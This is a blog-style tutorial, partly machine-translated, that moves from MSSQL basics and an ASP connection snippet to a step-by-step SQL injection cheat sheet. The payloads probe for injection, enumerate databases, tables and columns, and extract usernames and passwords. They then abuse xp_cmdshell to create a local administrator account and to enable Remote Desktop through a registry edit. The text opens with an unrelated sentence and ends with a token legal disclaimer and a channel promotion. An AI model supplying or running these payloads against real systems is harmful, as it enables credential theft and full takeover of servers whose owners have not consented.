You never know, people love to love you crazy, you sent a lengthy, are suddenly quiet down, no longer bother you, his heart experienced a kind of pain. . .
A, MSSQL Introduction
MSSQL business, good performance, ease of use, better business support, there are many types of higher precision, schools, government, online office, games, chess and other departments may use.
Port: 1433
Suffix: .mdf / .ldf
sa permissions: database operations, file management, command execution, reads the registry, the equivalent win system system
db permissions: document management, database operation, the system is equivalent to win adminnstrators
public authority: database operation, the system is equivalent to win guest
Two, SQL SERVER 2005
1, the installation is successful, enter the account password to log
2, master, model, msdb, tempdb database is the system comes with four database
3, right-click the database, the new database, automatically generates two files
4, double-click to expand the new database right hit the table, add a table, enter the column name and data type, save
5, right-click the new table, open the table, then you can add our data the
6, delete the database, you need to right-click on the database you want to delete, select the task, then selective separation, and then delete the directory into the database
7, add external databases, database files into the directory first, and then right-click the data in the database, select additional
8, back up the database, select the database to back right-click and select Generate script, select a script written for the server version (modified version for their own use)
9, restore the database, copy the script will export the contents inside the sql statement, run, and will rebuild a database, and the contents inside the same content database backup.
Third, the code calls
<%
cctt = “provier=sqloledb;source=local;uid=sa;pwd=**;database=database1”
Set conn = Server.Createobject(“ADODB.Connection”)
conn.open cctt
%>
provider后面的不用管,照写; source后面的可以是ip地址,这里我用的是本地的;sa是内置的用户,它的密码是你在安装的时候设置的; database后面是你要连接的数据库的名称.
四、判断注入
and 1=1 返回正常
and 1=2 返回错误,说明有注入
and user>0 返回正常,说明是sqlserver注入
and (select count(*)from sysobjects)>0 mssql 返回正常,说明是sqlserver注入
猜数表名
and( select count()from[表名])>0
猜字段
and( select Count(字段名)from[表名])>0
猜字段中记录长度
and(select top1len(字段名)from表名)>0
猜字段的asc值( access)
and( (select top1 asc(mid(字段名,1,1)from表名)>0
猜字段的ascii值(mssql)
and( select top1 unicode(substring(字段名1,1)from表名)>0
测试权限结构( mssql)
and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));-- //判断是否是系统管理员
and 1=(select IS_SRVROLEMEMBERC(‘serveradmin’));–
and 1=(select IS_SRVROLEMEMBERC(‘setupadmin’));–
and 1=(select IS_SRVROLEMEMBERC(‘securityadmin’));–
and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–
and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’);–
and 1=(select is_srvrolemember(‘db_owner’));–//判断是否是库权限
and 1=(select is_srvrolemember(‘public’));–//判断是否是pubilc权限
and 1=convert(int,db_name())或1=(select db_name())//当前数据库名
and 1=(select @@servername)//本地服务名
and 1=(select HAS_DBACCESS(‘master’))//判断是否有库读取权限
猜版本号
id=1 and 1=(select @@version)
id=@@version
猜数据库名称
id=1 and 1=(select db_name())
id=db_name()
获取所有数据库
id=1 and 1=(select name from master…sysdatabases for xml path)
获取第一个用户数据库
id=1 and 1=(select top 1 name from master…sysdatabases where dbid>4) #数据库是从第五个开始排的
获取下一个数据库
id=1 and 1=(select top 1 name from master…sysdatabases where dbid>4 and name <>‘上面查出来的数据库’)
或者
id=1 and 1=(select top 1 name from master…sysdatabases where dbid>5) #一次类推
获取所有表
id=1 and 1=(select name from sysobjects for xml path)
获取第一张表
id=1 and 1=(select top 1 name from sysobjects where xtype=‘u’)
获取下一张表
id=1 and 1=(select top 1 name from sysobjects where xtype=‘u’ and name <>‘上面查出来的表’)
获取表users第一列列名uname
id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name=‘users’))
获取表users第二列列名upass
id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name=‘users’) and name <> ‘uname’)
依次往后爆破
获取表users第一个用户名
?id=1 and 1=(select top 1 uname from users)
获取密码
?id=1 and 1=(select top 1 upass from users)
五、利用xp_cmdshell添加用户
id=1 ;exec master…xp_cmdshell ‘net user username password /add’
id=1 ;exec master… xp_cmdshell ‘net localgroup administrators username /add’ 添加到管理员组
六、开启3389端口
id=1 ;exec master…xp_cmdshell ‘sc config termservice start=auto’
;exec master…xp_cmdshell ‘net start termservice’
;exec master…xp_cmdshell ‘reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /vfDenyTSConnections /t REG_DWORD/d 0x0/f’
Prohibit illegal, at your peril
Welcome to public concern number: web security tool library
